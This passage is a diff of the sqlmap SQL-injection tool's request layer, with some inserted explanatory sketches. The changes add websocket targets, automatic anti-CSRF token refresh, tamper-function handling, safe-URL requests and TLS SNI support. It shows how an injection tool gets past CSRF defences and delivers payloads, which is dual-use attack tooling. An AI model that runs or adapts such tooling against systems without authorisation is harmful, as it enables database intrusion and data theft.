from lib.core.common import asciifyUrl
|
from lib.core.common import asciifyUrl
|
||||||
|
@ -27,6 +37,7 @@ from lib.core.common import evaluateCode
|
||||||
from lib.core.common import extractRegexResult
|
from lib.core.common import extractRegexResult
|
||||||
from lib.core.common import findMultipartPostBoundary
|
from lib.core.common import findMultipartPostBoundary
|
||||||
from lib.core.common import getCurrentThreadData
|
from lib.core.common import getCurrentThreadData
|
||||||
|
from lib.core.common import getHeader
|
||||||
from lib.core.common import getHostHeader
|
from lib.core.common import getHostHeader
|
||||||
from lib.core.common import getRequestHeader
|
from lib.core.common import getRequestHeader
|
||||||
from lib.core.common import getUnicode
|
from lib.core.common import getUnicode
|
||||||
|
@ -62,13 +73,16 @@ from lib.core.enums import REDIRECTION
|
||||||
from lib.core.enums import WEB_API
|
from lib.core.enums import WEB_API
|
||||||
from lib.core.exception import SqlmapCompressionException
|
from lib.core.exception import SqlmapCompressionException
|
||||||
from lib.core.exception import SqlmapConnectionException
|
from lib.core.exception import SqlmapConnectionException
|
||||||
|
from lib.core.exception import SqlmapGenericException
|
||||||
from lib.core.exception import SqlmapSyntaxException
|
from lib.core.exception import SqlmapSyntaxException
|
||||||
|
from lib.core.exception import SqlmapTokenException
|
||||||
from lib.core.exception import SqlmapValueException
|
from lib.core.exception import SqlmapValueException
|
||||||
from lib.core.settings import ASTERISK_MARKER
|
from lib.core.settings import ASTERISK_MARKER
|
||||||
from lib.core.settings import CUSTOM_INJECTION_MARK_CHAR
|
from lib.core.settings import CUSTOM_INJECTION_MARK_CHAR
|
||||||
from lib.core.settings import DEFAULT_CONTENT_TYPE
|
from lib.core.settings import DEFAULT_CONTENT_TYPE
|
||||||
from lib.core.settings import DEFAULT_COOKIE_DELIMITER
|
from lib.core.settings import DEFAULT_COOKIE_DELIMITER
|
||||||
from lib.core.settings import DEFAULT_GET_POST_DELIMITER
|
from lib.core.settings import DEFAULT_GET_POST_DELIMITER
|
||||||
|
from lib.core.settings import EVALCODE_KEYWORD_SUFFIX
|
||||||
from lib.core.settings import HTTP_ACCEPT_HEADER_VALUE
|
from lib.core.settings import HTTP_ACCEPT_HEADER_VALUE
|
||||||
from lib.core.settings import HTTP_ACCEPT_ENCODING_HEADER_VALUE
|
from lib.core.settings import HTTP_ACCEPT_ENCODING_HEADER_VALUE
|
||||||
from lib.core.settings import MAX_CONNECTION_CHUNK_SIZE
|
from lib.core.settings import MAX_CONNECTION_CHUNK_SIZE
|
||||||
|
@ -92,8 +106,9 @@ from lib.request.basic import processResponse
|
||||||
from lib.request.direct import direct
|
from lib.request.direct import direct
|
||||||
from lib.request.comparison import comparison
|
from lib.request.comparison import comparison
|
||||||
from lib.request.methodrequest import MethodRequest
|
from lib.request.methodrequest import MethodRequest
|
||||||
from thirdparty.socks.socks import ProxyError
|
|
||||||
from thirdparty.multipart import multipartpost
|
from thirdparty.multipart import multipartpost
|
||||||
|
from thirdparty.odict.odict import OrderedDict
|
||||||
|
from thirdparty.socks.socks import ProxyError
|
||||||
|
|
||||||
|
|
||||||
class Connect(object):
|
class Connect(object):

@@ -159,7 +174,7 @@ class Connect(object):

        if not kb.dnsMode and conn:
            headers = conn.info()
-            if headers and (headers.getheader(HTTP_HEADER.CONTENT_ENCODING, "").lower() in ("gzip", "deflate")\
+            if headers and hasattr(headers, "getheader") and (headers.getheader(HTTP_HEADER.CONTENT_ENCODING, "").lower() in ("gzip", "deflate")\
                    or "text" not in headers.getheader(HTTP_HEADER.CONTENT_TYPE, "").lower()):
                retVal = conn.read(MAX_CONNECTION_TOTAL_SIZE)
                if len(retVal) == MAX_CONNECTION_TOTAL_SIZE:

@@ -197,8 +212,10 @@ class Connect(object):
        elif conf.cpuThrottle:
            cpuThrottle(conf.cpuThrottle)

-        if conf.dummy:
-            return randomStr(int(randomInt()), alphabet=[chr(_) for _ in xrange(256)]), {}, int(randomInt())
+        if conf.offline:
+            return None, None, None
+        elif conf.dummy:
+            return getUnicode(randomStr(int(randomInt()), alphabet=[chr(_) for _ in xrange(256)]), {}, int(randomInt())), None, None

        threadData = getCurrentThreadData()
        with kb.locks.request:

@@ -226,6 +243,8 @@ class Connect(object):
        crawling = kwargs.get("crawling", False)
        skipRead = kwargs.get("skipRead", False)

+        websocket_ = url.lower().startswith("ws")
+
        if not urlparse.urlsplit(url).netloc:
            url = urlparse.urljoin(conf.url, url)

@@ -259,10 +278,6 @@ class Connect(object):
        # support those by default
        url = asciifyUrl(url)

-        # fix for known issues when using url in unicode format
-        # (e.g. UnicodeDecodeError: "url = url + '?' + query" in redirect case)
-        url = unicodeencode(url)
-
        try:
            socket.setdefaulttimeout(timeout)

@@ -271,7 +286,6 @@ class Connect(object):
                    url, params = url.split('?', 1)
                    params = urlencode(params)
                    url = "%s?%s" % (url, params)
-                    requestMsg += "?%s" % params

            elif multipart:
                # Needed in this form because of potential circle dependency

@@ -302,10 +316,14 @@ class Connect(object):
                    get = urlencode(get, limit=True)

                if get:
+                    if '?' in url:
+                        url = "%s%s%s" % (url, DEFAULT_GET_POST_DELIMITER, get)
+                        requestMsg += "%s%s" % (DEFAULT_GET_POST_DELIMITER, get)
+                    else:
                        url = "%s?%s" % (url, get)
                        requestMsg += "?%s" % get

-                if PLACE.POST in conf.parameters and not post and method in (None, HTTPMETHOD.POST):
+                if PLACE.POST in conf.parameters and not post and method != HTTPMETHOD.GET:
                    post = conf.parameters[PLACE.POST]

            elif get:

@@ -315,7 +333,7 @@ class Connect(object):
            requestMsg += " %s" % httplib.HTTPConnection._http_vsn_str

            # Prepare HTTP headers
-            headers = forgeHeaders({HTTP_HEADER.COOKIE: cookie, HTTP_HEADER.USER_AGENT: ua, HTTP_HEADER.REFERER: referer})
+            headers = forgeHeaders({HTTP_HEADER.COOKIE: cookie, HTTP_HEADER.USER_AGENT: ua, HTTP_HEADER.REFERER: referer, HTTP_HEADER.HOST: host})

            if kb.authHeader:
                headers[HTTP_HEADER.AUTHORIZATION] = kb.authHeader

@@ -323,11 +341,16 @@ class Connect(object):
            if kb.proxyAuthHeader:
                headers[HTTP_HEADER.PROXY_AUTHORIZATION] = kb.proxyAuthHeader

+            if not getHeader(headers, HTTP_HEADER.ACCEPT):
                headers[HTTP_HEADER.ACCEPT] = HTTP_ACCEPT_HEADER_VALUE
-            headers[HTTP_HEADER.ACCEPT_ENCODING] = HTTP_ACCEPT_ENCODING_HEADER_VALUE if kb.pageCompress else "identity"
-            headers[HTTP_HEADER.HOST] = host or getHostHeader(url)

-            if post is not None and HTTP_HEADER.CONTENT_TYPE not in headers:
+            if not getHeader(headers, HTTP_HEADER.HOST) or not target:
+                headers[HTTP_HEADER.HOST] = getHostHeader(url)
+
+            if not getHeader(headers, HTTP_HEADER.ACCEPT_ENCODING):
+                headers[HTTP_HEADER.ACCEPT_ENCODING] = HTTP_ACCEPT_ENCODING_HEADER_VALUE if kb.pageCompress else "identity"
+
+            if post is not None and not getHeader(headers, HTTP_HEADER.CONTENT_TYPE):
                headers[HTTP_HEADER.CONTENT_TYPE] = POST_HINT_CONTENT_TYPES.get(kb.postHint, DEFAULT_CONTENT_TYPE)

            if headers.get(HTTP_HEADER.CONTENT_TYPE) == POST_HINT_CONTENT_TYPES[POST_HINT.MULTIPART]:
@@ -350,15 +373,42 @@ class Connect(object):
                    del headers[key]
                    headers[unicodeencode(key, kb.pageEncoding)] = unicodeencode(item, kb.pageEncoding)

+            url = unicodeencode(url)
            post = unicodeencode(post, kb.pageEncoding)

-            if method:
+            if websocket_:
+                ws = websocket.WebSocket()
+                ws.connect(url, header=("%s: %s" % _ for _ in headers.items() if _[0] not in ("Host",)), cookie=cookie)  # WebSocket will add Host field of headers automatically
+                ws.send(urldecode(post or ""))
+                page = ws.recv()
+                ws.close()
+                code = ws.status
+                status = httplib.responses[code]
+                class _(dict):
+                    pass
+                responseHeaders = _(ws.getheaders())
+                responseHeaders.headers = ["%s: %s\r\n" % (_[0].capitalize(), _[1]) for _ in responseHeaders.items()]
+
+                requestHeaders += "\n".join("%s: %s" % (getUnicode(key.capitalize() if isinstance(key, basestring) else key), getUnicode(value)) for (key, value) in responseHeaders.items())
+                requestMsg += "\n%s" % requestHeaders
+
+                if post is not None:
+                    requestMsg += "\n\n%s" % getUnicode(post)
+
+                requestMsg += "\n"
+
+                threadData.lastRequestMsg = requestMsg
+
+                logger.log(CUSTOM_LOGGING.TRAFFIC_OUT, requestMsg)
+            else:
+                if method and method not in (HTTPMETHOD.GET, HTTPMETHOD.POST):
+                    method = unicodeencode(method)
                    req = MethodRequest(url, post, headers)
                    req.set_method(method)
                else:
                    req = urllib2.Request(url, post, headers)

-            requestHeaders += "\n".join("%s: %s" % (key.capitalize() if isinstance(key, basestring) else key, getUnicode(value)) for (key, value) in req.header_items())
+                requestHeaders += "\n".join("%s: %s" % (getUnicode(key.capitalize() if isinstance(key, basestring) else key), getUnicode(value)) for (key, value) in req.header_items())

                if not getRequestHeader(req, HTTP_HEADER.COOKIE) and conf.cj:
                    conf.cj._policy._now = conf.cj._now = int(time.time())
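
The hunk above is where ws:// and wss:// targets stop going through urllib2 and are handed to the bundled websocket-client package instead. A minimal standalone sketch of that request flow (hypothetical endpoint, header and cookie values; it assumes the third-party websocket module is importable, as it is from sqlmap's thirdparty/ directory):

    import httplib

    import websocket  # third-party websocket-client package

    url = "ws://target.example/echo"  # placeholder endpoint, not a real target

    ws = websocket.WebSocket()
    ws.connect(url, header=["User-Agent: sqlmap"], cookie="PHPSESSID=abc123")
    ws.send("id=1 AND 1=1")                      # request body travels as a frame
    page = ws.recv()                             # response frame plays the role of the HTTP body
    code = ws.status                             # status of the handshake response
    status = httplib.responses.get(code, "Unknown")
    headers = dict(ws.getheaders())              # handshake response headers
    ws.close()

Because a websocket exchange has no ordinary HTTP response, the handshake status and headers stand in for the usual response metadata, which is why the hunk maps ws.status through httplib.responses.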
@@ -385,7 +435,7 @@ class Connect(object):

                conn = urllib2.urlopen(req)

-                if not kb.authHeader and getRequestHeader(req, HTTP_HEADER.AUTHORIZATION) and conf.authType == AUTH_TYPE.BASIC:
+                if not kb.authHeader and getRequestHeader(req, HTTP_HEADER.AUTHORIZATION) and (conf.authType or "").lower() == AUTH_TYPE.BASIC.lower():
                    kb.authHeader = getRequestHeader(req, HTTP_HEADER.AUTHORIZATION)

                if not kb.proxyAuthHeader and getRequestHeader(req, HTTP_HEADER.PROXY_AUTHORIZATION):

@@ -442,7 +492,7 @@ class Connect(object):
                    pass

            # Explicit closing of connection object
-            if not conf.keepAlive:
+            if conn and not conf.keepAlive:
                try:
                    if hasattr(conn.fp, '_sock'):
                        conn.fp._sock.close()

@@ -473,8 +523,9 @@ class Connect(object):
            page = page if isinstance(page, unicode) else getUnicode(page)

            code = e.code
-            threadData.lastHTTPError = (threadData.lastRequestUID, code)

+            kb.originalCode = kb.originalCode or code
+            threadData.lastHTTPError = (threadData.lastRequestUID, code)
            kb.httpErrorCodes[code] = kb.httpErrorCodes.get(code, 0) + 1

            status = getUnicode(e.msg)

@@ -524,18 +575,22 @@ class Connect(object):
                debugMsg = "got HTTP error code: %d (%s)" % (code, status)
                logger.debug(debugMsg)

-        except (urllib2.URLError, socket.error, socket.timeout, httplib.BadStatusLine, httplib.IncompleteRead, ProxyError, SqlmapCompressionException), e:
+        except (urllib2.URLError, socket.error, socket.timeout, httplib.HTTPException, struct.error, ProxyError, SqlmapCompressionException, WebSocketException), e:
            tbMsg = traceback.format_exc()

            if "no host given" in tbMsg:
                warnMsg = "invalid URL address used (%s)" % repr(url)
                raise SqlmapSyntaxException(warnMsg)
-            elif "forcibly closed" in tbMsg:
+            elif "forcibly closed" in tbMsg or "Connection is already closed" in tbMsg:
                warnMsg = "connection was forcibly closed by the target URL"
            elif "timed out" in tbMsg:
+                if kb.testMode and kb.testType not in (None, PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED):
+                    singleTimeWarnMessage("there is a possibility that the target (or WAF) is dropping 'suspicious' requests")
                warnMsg = "connection timed out to the target URL"
            elif "URLError" in tbMsg or "error" in tbMsg:
                warnMsg = "unable to connect to the target URL"
+            elif "NTLM" in tbMsg:
+                warnMsg = "there has been a problem with NTLM authentication"
            elif "BadStatusLine" in tbMsg:
                warnMsg = "connection dropped or unknown HTTP "
                warnMsg += "status code received"

@@ -545,6 +600,10 @@ class Connect(object):
            elif "IncompleteRead" in tbMsg:
                warnMsg = "there was an incomplete read error while retrieving data "
                warnMsg += "from the target URL"
+            elif "Handshake status" in tbMsg:
+                status = re.search("Handshake status ([\d]{3})", tbMsg)
+                errMsg = "websocket handshake status %s" % status.group(1) if status else "unknown"
+                raise SqlmapConnectionException(errMsg)
            else:
                warnMsg = "unable to connect to the target URL"

@@ -581,7 +640,13 @@ class Connect(object):
        if conn and getattr(conn, "redurl", None):
            _ = urlparse.urlsplit(conn.redurl)
            _ = ("%s%s" % (_.path or "/", ("?%s" % _.query) if _.query else ""))
-            requestMsg = re.sub("(\n[A-Z]+ ).+?( HTTP/\d)", "\g<1>%s\g<2>" % getUnicode(_), requestMsg, 1)
+            requestMsg = re.sub("(\n[A-Z]+ ).+?( HTTP/\d)", "\g<1>%s\g<2>" % re.escape(getUnicode(_)), requestMsg, 1)
+
+            if kb.resendPostOnRedirect is False:
+                requestMsg = re.sub("(\[#\d+\]:\n)POST ", "\g<1>GET ", requestMsg)
+                requestMsg = re.sub("(?i)Content-length: \d+\n", "", requestMsg)
+                requestMsg = re.sub("(?s)\n\n.+", "\n", requestMsg)
+
            responseMsg += "[#%d] (%d %s):\n" % (threadData.lastRequestUID, conn.code, status)
        else:
            responseMsg += "[#%d] (%d %s):\n" % (threadData.lastRequestUID, code, status)

@@ -630,13 +695,14 @@ class Connect(object):
        auxHeaders = {}

        raise404 = place != PLACE.URI if raise404 is None else raise404
+        method = method or conf.method

        value = agent.adjustLateValues(value)
        payload = agent.extractPayload(value)
        threadData = getCurrentThreadData()

        if conf.httpHeaders:
-            headers = dict(conf.httpHeaders)
+            headers = OrderedDict(conf.httpHeaders)
            contentType = max(headers[_] if _.upper() == HTTP_HEADER.CONTENT_TYPE.upper() else None for _ in headers.keys())

        if (kb.postHint or conf.skipUrlEncode) and kb.postUrlEncode:

@@ -648,7 +714,13 @@ class Connect(object):
        if payload:
            if kb.tamperFunctions:
                for function in kb.tamperFunctions:
+                    try:
                        payload = function(payload=payload, headers=auxHeaders)
+                    except Exception, ex:
+                        errMsg = "error occurred while running tamper "
+                        errMsg += "function '%s' ('%s')" % (function.func_name, ex)
+                        raise SqlmapGenericException(errMsg)

                    if not isinstance(payload, basestring):
                        errMsg = "tamper function '%s' returns " % function.func_name
                        errMsg += "invalid payload type ('%s')" % type(payload)

@@ -677,7 +749,7 @@ class Connect(object):
                payload = payload.replace("'", REPLACEMENT_MARKER).replace('"', "'").replace(REPLACEMENT_MARKER, '"')
                value = agent.replacePayload(value, payload)
        else:
-            # GET, POST, URI and Cookie payload needs to be throughly URL encoded
+            # GET, POST, URI and Cookie payload needs to be thoroughly URL encoded
            if place in (PLACE.GET, PLACE.URI, PLACE.COOKIE) and not conf.skipUrlEncode or place in (PLACE.POST, PLACE.CUSTOM_POST) and kb.postUrlEncode:
                payload = urlencode(payload, '%', False, place != PLACE.URI)  # spaceplus is handled down below
                value = agent.replacePayload(value, payload)
@@ -745,54 +817,137 @@ class Connect(object):
        if value and place == PLACE.CUSTOM_HEADER:
            auxHeaders[value.split(',')[0]] = value.split(',', 1)[1]

+        if conf.csrfToken:
+            def _adjustParameter(paramString, parameter, newValue):
+                retVal = paramString
+                match = re.search("%s=(?P<value>[^&]*)" % re.escape(parameter), paramString)
+                if match:
+                    retVal = re.sub("%s=[^&]*" % re.escape(parameter), "%s=%s" % (parameter, newValue), paramString)
+                return retVal
+
+            page, headers, code = Connect.getPage(url=conf.csrfUrl or conf.url, data=conf.data if conf.csrfUrl == conf.url else None, method=conf.method if conf.csrfUrl == conf.url else None, cookie=conf.parameters.get(PLACE.COOKIE), direct=True, silent=True, ua=conf.parameters.get(PLACE.USER_AGENT), referer=conf.parameters.get(PLACE.REFERER), host=conf.parameters.get(PLACE.HOST))
+            match = re.search(r"<input[^>]+name=[\"']?%s[\"']?\s[^>]*value=(\"([^\"]+)|'([^']+)|([^ >]+))" % re.escape(conf.csrfToken), page or "")
+            token = (match.group(2) or match.group(3) or match.group(4)) if match else None
+
+            if not token:
+                if conf.csrfUrl != conf.url and code == httplib.OK:
+                    if headers and "text/plain" in headers.get(HTTP_HEADER.CONTENT_TYPE, ""):
+                        token = page
+
+                if not token and any(_.name == conf.csrfToken for _ in conf.cj):
+                    for _ in conf.cj:
+                        if _.name == conf.csrfToken:
+                            token = _.value
+                            if not any (conf.csrfToken in _ for _ in (conf.paramDict.get(PLACE.GET, {}), conf.paramDict.get(PLACE.POST, {}))):
+                                if post:
+                                    post = "%s%s%s=%s" % (post, conf.paramDel or DEFAULT_GET_POST_DELIMITER, conf.csrfToken, token)
+                                elif get:
+                                    get = "%s%s%s=%s" % (get, conf.paramDel or DEFAULT_GET_POST_DELIMITER, conf.csrfToken, token)
+                                else:
+                                    get = "%s=%s" % (conf.csrfToken, token)
+                            break
+
+                if not token:
+                    errMsg = "anti-CSRF token '%s' can't be found at '%s'" % (conf.csrfToken, conf.csrfUrl or conf.url)
+                    if not conf.csrfUrl:
+                        errMsg += ". You can try to rerun by providing "
+                        errMsg += "a valid value for option '--csrf-url'"
+                    raise SqlmapTokenException, errMsg
+
+            if token:
+                for place in (PLACE.GET, PLACE.POST):
+                    if place in conf.parameters:
+                        if place == PLACE.GET and get:
+                            get = _adjustParameter(get, conf.csrfToken, token)
+                        elif place == PLACE.POST and post:
+                            post = _adjustParameter(post, conf.csrfToken, token)
+
+                for i in xrange(len(conf.httpHeaders)):
+                    if conf.httpHeaders[i][0].lower() == conf.csrfToken.lower():
+                        conf.httpHeaders[i] = (conf.httpHeaders[i][0], token)
+
        if conf.rParam:
            def _randomizeParameter(paramString, randomParameter):
                retVal = paramString
-                match = re.search("%s=(?P<value>[^&;]+)" % randomParameter, paramString)
+                match = re.search(r"(\A|\b)%s=(?P<value>[^&;]+)" % re.escape(randomParameter), paramString)
                if match:
                    origValue = match.group("value")
-                    retVal = re.sub("%s=[^&;]+" % randomParameter, "%s=%s" % (randomParameter, randomizeParameterValue(origValue)), paramString)
+                    retVal = re.sub(r"(\A|\b)%s=[^&;]+" % re.escape(randomParameter), "%s=%s" % (randomParameter, randomizeParameterValue(origValue)), paramString)
                return retVal

            for randomParameter in conf.rParam:
-                for item in (PLACE.GET, PLACE.POST, PLACE.COOKIE):
+                for item in (PLACE.GET, PLACE.POST, PLACE.COOKIE, PLACE.URI, PLACE.CUSTOM_POST):
                    if item in conf.parameters:
                        if item == PLACE.GET and get:
                            get = _randomizeParameter(get, randomParameter)
-                        elif item == PLACE.POST and post:
+                        elif item in (PLACE.POST, PLACE.CUSTOM_POST) and post:
                            post = _randomizeParameter(post, randomParameter)
                        elif item == PLACE.COOKIE and cookie:
                            cookie = _randomizeParameter(cookie, randomParameter)
+                        elif item == PLACE.URI and uri:
+                            uri = _randomizeParameter(uri, randomParameter)

        if conf.evalCode:
            delimiter = conf.paramDel or DEFAULT_GET_POST_DELIMITER
-            variables = {}
+            variables = {"uri": uri}
            originals = {}
+            keywords = keyword.kwlist

            for item in filter(None, (get, post if not kb.postHint else None)):
                for part in item.split(delimiter):
                    if '=' in part:
                        name, value = part.split('=', 1)
+                        name = re.sub(r"[^\w]", "", name.strip())
+                        if name in keywords:
+                            name = "%s%s" % (name, EVALCODE_KEYWORD_SUFFIX)
                        value = urldecode(value, convall=True, plusspace=(item==post and kb.postSpaceToPlus))
-                        evaluateCode("%s=%s" % (name.strip(), repr(value)), variables)
+                        variables[name] = value

            if cookie:
                for part in cookie.split(conf.cookieDel or DEFAULT_COOKIE_DELIMITER):
                    if '=' in part:
                        name, value = part.split('=', 1)
+                        name = re.sub(r"[^\w]", "", name.strip())
+                        if name in keywords:
+                            name = "%s%s" % (name, EVALCODE_KEYWORD_SUFFIX)
                        value = urldecode(value, convall=True)
-                        evaluateCode("%s=%s" % (name.strip(), repr(value)), variables)
+                        variables[name] = value

+            while True:
+                try:
+                    compiler.parse(conf.evalCode.replace(';', '\n'))
+                except SyntaxError, ex:
+                    original = replacement = ex.text.strip()
+                    for _ in re.findall(r"[A-Za-z_]+", original)[::-1]:
+                        if _ in keywords:
+                            replacement = replacement.replace(_, "%s%s" % (_, EVALCODE_KEYWORD_SUFFIX))
+                            break
+                    if original == replacement:
+                        conf.evalCode = conf.evalCode.replace(EVALCODE_KEYWORD_SUFFIX, "")
+                        break
+                    else:
+                        conf.evalCode = conf.evalCode.replace(ex.text.strip(), replacement)
+                else:
+                    break
+
            originals.update(variables)
            evaluateCode(conf.evalCode, variables)
+
+            for variable in variables.keys():
+                if variable.endswith(EVALCODE_KEYWORD_SUFFIX):
+                    value = variables[variable]
+                    del variables[variable]
+                    variables[variable.replace(EVALCODE_KEYWORD_SUFFIX, "")] = value
+
+            uri = variables["uri"]

            for name, value in variables.items():
                if name != "__builtins__" and originals.get(name, "") != value:
                    if isinstance(value, (basestring, int)):
                        found = False
                        value = unicode(value)

-                        regex = r"((\A|%s)%s=).+?(%s|\Z)" % (re.escape(delimiter), name, re.escape(delimiter))
+                        regex = r"((\A|%s)%s=).+?(%s|\Z)" % (re.escape(delimiter), re.escape(name), re.escape(delimiter))
                        if re.search(regex, (get or "")):
                            found = True
                            get = re.sub(regex, "\g<1>%s\g<3>" % value, get)
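
The anti-CSRF handling added above boils down to: fetch the token page, pull the value out of a hidden input (or, failing that, a cookie), and rewrite or append the token parameter before every request. A simplified standalone sketch under assumed names (CSRF_URL, CSRF_TOKEN and the sample query string are placeholders for illustration, not sqlmap options):

    import re
    import urllib2

    CSRF_URL = "http://target.example/form"     # hypothetical token page
    CSRF_TOKEN = "csrfmiddlewaretoken"          # hypothetical token parameter name

    def fetch_token():
        # pull the token out of a hidden <input> on the token page
        page = urllib2.urlopen(CSRF_URL).read()
        match = re.search(r"<input[^>]+name=[\"']?%s[\"']?\s[^>]*value=[\"']?([^\"' >]+)" % re.escape(CSRF_TOKEN), page)
        return match.group(1) if match else None

    def refresh_parameter(params, token):
        # replace an existing token value, or append one if the parameter is missing
        if re.search(r"%s=[^&]*" % re.escape(CSRF_TOKEN), params):
            return re.sub(r"%s=[^&]*" % re.escape(CSRF_TOKEN), "%s=%s" % (CSRF_TOKEN, token), params)
        return "%s&%s=%s" % (params, CSRF_TOKEN, token)

    # usage with a hard-coded token, so nothing is fetched here
    post = refresh_parameter("id=1&submit=Go", "deadbeef")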
@@ -856,23 +1011,26 @@ class Connect(object):
            if deviation > WARN_TIME_STDEV:
                kb.adjustTimeDelay = ADJUST_TIME_DELAY.DISABLE

-                warnMsg = "there is considerable lagging "
+                warnMsg = "considerable lagging has been detected "
                warnMsg += "in connection response(s). Please use as high "
                warnMsg += "value for option '--time-sec' as possible (e.g. "
                warnMsg += "10 or more)"
                logger.critical(warnMsg)

-        if conf.safUrl and conf.saFreq > 0:
+        if conf.safeFreq > 0:
            kb.queryCounter += 1
-            if kb.queryCounter % conf.saFreq == 0:
-                Connect.getPage(url=conf.safUrl, cookie=cookie, direct=True, silent=True, ua=ua, referer=referer, host=host)
+            if kb.queryCounter % conf.safeFreq == 0:
+                if conf.safeUrl:
+                    Connect.getPage(url=conf.safeUrl, post=conf.safePost, cookie=cookie, direct=True, silent=True, ua=ua, referer=referer, host=host)
+                elif kb.safeReq:
+                    Connect.getPage(url=kb.safeReq.url, post=kb.safeReq.post, method=kb.safeReq.method, auxHeaders=kb.safeReq.headers)

        start = time.time()

        if kb.nullConnection and not content and not response and not timeBasedCompare:
            noteResponseTime = False

+            try:
                pushValue(kb.pageCompress)
                kb.pageCompress = False

@@ -881,19 +1039,19 @@ class Connect(object):
                elif kb.nullConnection == NULLCONNECTION.RANGE:
                    auxHeaders[HTTP_HEADER.RANGE] = "bytes=-1"

-                _, headers, code = Connect.getPage(url=uri, get=get, post=post, cookie=cookie, ua=ua, referer=referer, host=host, silent=silent, method=method, auxHeaders=auxHeaders, raise404=raise404, skipRead=(kb.nullConnection == NULLCONNECTION.SKIP_READ))
+                _, headers, code = Connect.getPage(url=uri, get=get, post=post, method=method, cookie=cookie, ua=ua, referer=referer, host=host, silent=silent, auxHeaders=auxHeaders, raise404=raise404, skipRead=(kb.nullConnection == NULLCONNECTION.SKIP_READ))

                if headers:
                    if kb.nullConnection in (NULLCONNECTION.HEAD, NULLCONNECTION.SKIP_READ) and HTTP_HEADER.CONTENT_LENGTH in headers:
                        pageLength = int(headers[HTTP_HEADER.CONTENT_LENGTH])
                    elif kb.nullConnection == NULLCONNECTION.RANGE and HTTP_HEADER.CONTENT_RANGE in headers:
                        pageLength = int(headers[HTTP_HEADER.CONTENT_RANGE][headers[HTTP_HEADER.CONTENT_RANGE].find('/') + 1:])
+            finally:
                kb.pageCompress = popValue()

        if not pageLength:
            try:
-                page, headers, code = Connect.getPage(url=uri, get=get, post=post, cookie=cookie, ua=ua, referer=referer, host=host, silent=silent, method=method, auxHeaders=auxHeaders, response=response, raise404=raise404, ignoreTimeout=timeBasedCompare)
+                page, headers, code = Connect.getPage(url=uri, get=get, post=post, method=method, cookie=cookie, ua=ua, referer=referer, host=host, silent=silent, auxHeaders=auxHeaders, response=response, raise404=raise404, ignoreTimeout=timeBasedCompare)
            except MemoryError:
                page, headers, code = None, None, None
                warnMsg = "site returned insanely large response"
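
Both getPage() calls above now pass method explicitly, including for the "null connection" shortcuts that read only a Content-Length (HEAD) or Content-Range (Range: bytes=-1) header instead of transferring the body. A rough standalone illustration of those two tricks with plain urllib2 (hypothetical URL; this is not sqlmap's own implementation):

    import urllib2

    class HeadRequest(urllib2.Request):
        # urllib2 has no built-in HEAD support; overriding get_method() is the usual trick
        def get_method(self):
            return "HEAD"

    def page_length(url):
        # HEAD variant: only headers are transferred
        response = urllib2.urlopen(HeadRequest(url))
        length = response.info().getheader("Content-Length")
        if length is not None:
            return int(length)

        # Range variant: ask for the last byte only and parse "bytes 0-0/12345"
        request = urllib2.Request(url, headers={"Range": "bytes=-1"})
        response = urllib2.urlopen(request)
        content_range = response.info().getheader("Content-Range") or ""
        return int(content_range.rsplit('/', 1)[-1]) if '/' in content_range else None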
@@ -1,7 +1,7 @@
#!/usr/bin/env python

"""
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""

@@ -1,7 +1,7 @@
#!/usr/bin/env python

"""
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""

@@ -1,7 +1,7 @@
#!/usr/bin/env python

"""
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""

@@ -9,6 +9,7 @@ import httplib
import socket
import urllib2

+from lib.core.data import kb
from lib.core.data import logger
from lib.core.exception import SqlmapConnectionException

@@ -19,7 +20,7 @@ try:
except ImportError:
    pass

-_protocols = [ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_SSLv23]
+_protocols = filter(None, (getattr(ssl, _, None) for _ in ("PROTOCOL_TLSv1_2", "PROTOCOL_TLSv1_1", "PROTOCOL_TLSv1", "PROTOCOL_SSLv3", "PROTOCOL_SSLv23", "PROTOCOL_SSLv2")))

class HTTPSConnection(httplib.HTTPSConnection):
    """

@@ -41,6 +42,7 @@ class HTTPSConnection(httplib.HTTPSConnection):

        success = False

+        if not kb.tlsSNI:
            for protocol in _protocols:
                try:
                    sock = create_sock()

@@ -53,7 +55,28 @@ class HTTPSConnection(httplib.HTTPSConnection):
                        break
                    else:
                        sock.close()
-            except ssl.SSLError, errMsg:
+                except (ssl.SSLError, socket.error, httplib.BadStatusLine), errMsg:
+                    self._tunnel_host = None
+                    logger.debug("SSL connection error occurred ('%s')" % errMsg)
+
+        # Reference(s): https://docs.python.org/2/library/ssl.html#ssl.SSLContext
+        #               https://www.mnot.net/blog/2014/12/27/python_2_and_tls_sni
+        if not success and hasattr(ssl, "SSLContext"):
+            for protocol in filter(lambda _: _ >= ssl.PROTOCOL_TLSv1, _protocols):
+                try:
+                    sock = create_sock()
+                    context = ssl.SSLContext(protocol)
+                    _ = context.wrap_socket(sock, do_handshake_on_connect=False, server_hostname=self.host)
+                    if _:
+                        kb.tlsSNI = success = True
+                        self.sock = _
+                        _protocols.remove(protocol)
+                        _protocols.insert(0, protocol)
+                        break
+                    else:
+                        sock.close()
+                except (ssl.SSLError, socket.error, httplib.BadStatusLine), errMsg:
+                    self._tunnel_host = None
                    logger.debug("SSL connection error occurred ('%s')" % errMsg)

        if not success:
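
The SSLContext fallback added above is what makes SNI work from Python 2.7.9 onwards. Stripped of the sqlmap bookkeeping, the idea reduces to roughly this sketch (it assumes a 2.7.9+ interpreter whenever the SSLContext branch is taken, which is what the hasattr() guard checks):

    import socket
    import ssl

    def sni_connect(host, port=443):
        sock = socket.create_connection((host, port))
        if hasattr(ssl, "SSLContext"):
            # SSLContext.wrap_socket() accepts server_hostname, so the TLS
            # handshake carries the SNI extension for name-based virtual hosts
            context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
            return context.wrap_socket(sock, server_hostname=host)
        # older interpreters: module-level wrap_socket(), no SNI
        return ssl.wrap_socket(sock)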
@@ -1,7 +1,7 @@
#!/usr/bin/env python

"""
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
